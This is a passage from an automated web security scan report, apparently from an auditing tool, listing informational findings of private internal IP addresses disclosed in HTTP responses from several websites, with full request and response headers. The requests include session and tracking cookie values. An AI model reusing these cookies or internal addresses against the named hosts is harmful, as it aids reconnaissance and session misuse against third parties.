Host:   http://www.fischerinternational.com
Path:   /pics/banner_logo_fischer09.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/banner_logo_fischer09.jpg HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "84b59b328641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:26:36 GMT
X-Powered-By: ASP.NET
Content-Length: 6249
Date: Sun, 24 Apr 2011 19:45:54 GMT
X-Varnish: 1806956568
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................e....
...[SNIP]...

27.19. http://www.fischerinternational.com/pics/bg_body2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/bg_body2.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/bg_body2.gif HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "221c6e338641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:26:37 GMT
X-Powered-By: ASP.NET
Content-Length: 376
Date: Sun, 24 Apr 2011 19:45:54 GMT
X-Varnish: 1806956565
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a..................................................................................................................................................................................................
...[SNIP]...

27.20. http://www.fischerinternational.com/pics/btn_view2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/btn_view2.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/btn_view2.gif HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "8ac31d3d8641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:26:54 GMT
X-Powered-By: ASP.NET
Content-Length: 664
Date: Sun, 24 Apr 2011 19:45:57 GMT
X-Varnish: 1806957695
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a-..............'.d,.s&........tW,.n...z........)..SUF0..x...........3........A..;..f........K........!.....T.....l..&....._.....r..1...B<3.._..+........8........I555..b........w................
...[SNIP]...

27.21. http://www.fischerinternational.com/pics/bullet_arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/bullet_arrow.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/bullet_arrow.gif HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "8657973d8641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:26:54 GMT
X-Powered-By: ASP.NET
Content-Length: 56
Date: Sun, 24 Apr 2011 19:45:56 GMT
X-Varnish: 1806957514
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a    .    ..........!.......,....    .    .......k.~`..&G_....;

27.22. http://www.fischerinternational.com/pics/header_identity_management09-1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/header_identity_management09-1.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/header_identity_management09-1.gif HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "d6e4d74c8641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:27:20 GMT
X-Powered-By: ASP.NET
Content-Length: 1461
Date: Sun, 24 Apr 2011 19:45:56 GMT
X-Varnish: 1806957509
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89ah.*........Ky:c..?o...e.....+W.Ho.W{.t............3f...................................................!.......,....h.*.... $.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n....|N.
...[SNIP]...

27.23. http://www.fischerinternational.com/pics/header_identity_management09.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/header_identity_management09.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/header_identity_management09.jpg HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "d87ad54d8641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:27:22 GMT
X-Powered-By: ASP.NET
Content-Length: 6834
Date: Sun, 24 Apr 2011 19:45:55 GMT
X-Varnish: 1806957250
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................#.h..
...[SNIP]...

27.24. http://www.fischerinternational.com/pics/header_news_events.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/header_news_events.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/header_news_events.gif HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "5cbaa41bacc4ca1:0"
Last-Modified: Tue, 16 Mar 2010 01:58:01 GMT
X-Powered-By: ASP.NET
Content-Length: 17670
Date: Sun, 24 Apr 2011 19:45:56 GMT
X-Varnish: 1806957510
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a1.#....8UoRo.Qn.Daz@]w1PiB_xNk.<Zs+JdPm.'F`/Ng6Tm:Xq>\uPl.3Rk4Qk>[u5Sm:Wq/Mg(F`+IdRo.*HbNl.Fd|Rm.Nl.Mi..........m.....j..k...........g....q........cz.k.................}.................bz.p...
...[SNIP]...

27.25. http://www.fischerinternational.com/pics/homepage_champion_right09.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/homepage_champion_right09.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/homepage_champion_right09.jpg HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "7818b44f8641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:27:25 GMT
X-Powered-By: ASP.NET
Content-Length: 45759
Date: Sun, 24 Apr 2011 19:45:55 GMT
X-Varnish: 1806957203
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ..........................................................^..
...[SNIP]...

27.26. http://www.fischerinternational.com/pics/masthead_bg09.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/masthead_bg09.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/masthead_bg09.jpg HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "c026649c4c78ca1:0"
Last-Modified: Tue, 08 Dec 2009 21:22:57 GMT
X-Powered-By: ASP.NET
Content-Length: 140665
Date: Sun, 24 Apr 2011 19:45:54 GMT
X-Varnish: 1806956558
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c036 46.27
...[SNIP]...

27.27. http://www.fischerinternational.com/pics/nav_company.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/nav_company.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/nav_company.gif HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "c0fd1f618641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:27:54 GMT
X-Powered-By: ASP.NET
Content-Length: 2364
Date: Sun, 24 Apr 2011 19:45:54 GMT
X-Varnish: 1806956559
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89aM.T......1..FW....~..f..s..Xh..w............. I...[..a..l.B:1......\E*3x.;}.....V .....Q.w..q.t..uP#hK'.f.......O@........|.AAA999...f..Y........=~.K........ME=....j%...}Z/..`}........kO+F>5....
...[SNIP]...

27.28. http://www.fischerinternational.com/pics/nav_contact.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/nav_contact.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/nav_contact.gif HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "4f593618641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:27:55 GMT
X-Powered-By: ASP.NET
Content-Length: 2503
Date: Sun, 24 Apr 2011 19:45:55 GMT
X-Varnish: 1806957083
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89aU.T......F..X..fw.....h....s..~......W....1I.... ...B:1.a.\E*...hK'3x....;}..[.O@..|..w...Q...uP#.l.=~.AAA....V ..........f.999....q.K........t..Y......d....YK:...f..pU3......b..OOO..`}..ZSK...w
...[SNIP]...

27.29. http://www.fischerinternational.com/pics/nav_identity.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/nav_identity.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/nav_identity.gif HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "80d081628641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:27:56 GMT
X-Powered-By: ASP.NET
Content-Length: 3031
Date: Sun, 24 Apr 2011 19:45:54 GMT
X-Varnish: 1806956573
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89ao.T......X...w....f.....s.....~..Fh..W....1@90tO"I.... .Z..`..k.ZD).|....gI%...;}..v
...3x.M>,..............Q....U.t..K...q.....e.=~....Y........tQ'....a....tP#......gK)......gJ&@91.[.......f...
...[SNIP]...

27.30. http://www.fischerinternational.com/pics/nav_press_rm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/nav_press_rm.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/nav_press_rm.gif HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "103af6628641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:27:57 GMT
X-Powered-By: ASP.NET
Content-Length: 2573
Date: Sun, 24 Apr 2011 19:45:55 GMT
X-Varnish: 1806957086
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a\.T.....a...F..sh....f.....~w....X......W....1I.... .[..w.....|.B:1...;}....3x.hK'.l.O@.uP#\E*.....QAAA......Y..K.....999t......q..V ....d....\\\.......j%....f.=~.....u5f......^ w..F>5...eP6..`}
...[SNIP]...

27.31. http://www.fischerinternational.com/pics/nav_support.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/nav_support.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/nav_support.gif HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "6c5a6a638641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:27:58 GMT
X-Powered-By: ASP.NET
Content-Length: 2240
Date: Sun, 24 Apr 2011 19:45:55 GMT
X-Varnish: 1806957082
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89aD.T......Fw..W....sh....~..1..X.....f......I.... .[..w.\E*...hK'uP#...;}.......3x..|..l...Q...Y..AAA....V .a.999B:1=~..q..f....t..K.....O@....f..........`..........d(}..A......^ ....z.eP6U......
...[SNIP]...

27.32. http://www.fischerinternational.com/pics/nav_tech.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/nav_tech.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/nav_tech.gif HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "309fde638641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:27:59 GMT
X-Powered-By: ASP.NET
Content-Length: 3463
Date: Sun, 24 Apr 2011 19:45:55 GMT
X-Varnish: 1806957081
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a..T....@90..Fw....f.....sh..........X..~W....1I.... .k..Z..`.tO"...ZD)......;}....3x.gI%t...|.......M>,.U.....v
=~.........Q.e..q..........K..@91......Y..tQ'ZD*............i..A...[..r....f..ZE,.
...[SNIP]...

27.33. http://www.fischerinternational.com/pics/pixel_white.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/pixel_white.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/pixel_white.gif HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "d4653b658641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:28:01 GMT
X-Powered-By: ASP.NET
Content-Length: 43
Date: Sun, 24 Apr 2011 19:45:56 GMT
X-Varnish: 1806957670
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a.............!.......,...........D..;

27.34. http://www.fischerinternational.com/pics/tableHomeBG.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /pics/tableHomeBG.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pics/tableHomeBG.jpg HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "9056feae8641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:30:05 GMT
X-Powered-By: ASP.NET
Content-Length: 3256
Date: Sun, 24 Apr 2011 19:45:56 GMT
X-Varnish: 1806957507
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ..........................................................h..
...[SNIP]...

27.35. http://www.google.com/sdch/rU20-FBA.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/rU20-FBA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/rU20-FBA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=I-kkntLExM1TTzSWRyCwKeEK8o5z0wImIqRngsTZ1f7pPvcoVlw_RvPfaxCnExmyYdaAF09G-fMazzXzLodN-Utpj4hqQcsHLazgtjUOhze8vEcdwKcppf0Keaf3xqTz
If-Modified-Since: Sat, 23 Apr 2011 01:57:23 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Sun, 24 Apr 2011 13:41:46 GMT
Date: Sun, 24 Apr 2011 19:45:32 GMT
Expires: Sun, 24 Apr 2011 19:45:32 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 96018

Domain: .google.com
Path: /search

<!doctype html><head><title>used car<!doctype html><head><title>direct - Google Search</title><script>window.google={kEI:" WJ_5AK2N-RqwM",kEXPI:"25907,2
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0C
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: mXEkS0TMcmsJ:www.edmunds.com/used-cars/+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CD
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:explore.live.com/windows-live- onmousedown="return clk(this.href,'','','',' gQqwMoA </a>
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:www.thecarconnection.com/make/new,J:www.motortrend.com/new_cars/01/y4a-lQGHU2cJ:www.vehix.com/+used+car5Ke98xsxxpYJ:www.whitepages.com/person+ &amp;hl=en&amp;ct=clnk&amp;
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: contact_us+direct en.wikipedia.org/wiki/DirecTV+direct onmousedown="return clk(this.href,'','','',' 2','','0CD')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: www.carsdirect.com/used_cars/search this.href,'','','','1','','0C directv.com/DTVAPP/content/My_Account OsWJ_5AK2N-RqwM&amp;ved=0CH </a>
...[SNIP]...
<a href="/search?hl=en&amp;q=http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:yTixchY6gV0J:www.dish-television.com/+direct rZQjSq2ux10J:translate.reference.com/+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: this.href,'','','',' ')">
...[SNIP]...

27.36. http://www.infusionblog.com/wp-content/uploads/2010/05/RSS.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /wp-content/uploads/2010/05/RSS.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2010/05/RSS.png HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-glbfbjch=297A6E0D2EEC0E566AD0298A06CE1FEE

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: image/png
Expires: Fri, 20 Apr 2012 18:46:14 GMT
Pragma: public
Last-Modified: Mon, 14 Jun 2010 20:49:53 GMT
Content-Length: 4936
Date: Mon, 25 Apr 2011 01:07:08 GMT
X-Varnish: 1412459992 1394179340
Age: 282054
Connection: keep-alive
Via: 1.1 varnish 172.17.35.70
X-Cache: HIT

.PNG
.
...IHDR...2...2......?......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z{.\.}...s....}y.....F`.1.I...%J..U.F*.4%R............    R...Ji.D.DQ.6m    .*."... `...w......{...;..;3..G..H...;s...=....2
...[SNIP]...

27.37. http://www.infusionblog.com/wp-content/uploads/2011/02/top-bg-infusionblog.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /wp-content/uploads/2011/02/top-bg-infusionblog.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/02/top-bg-infusionblog.jpg HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
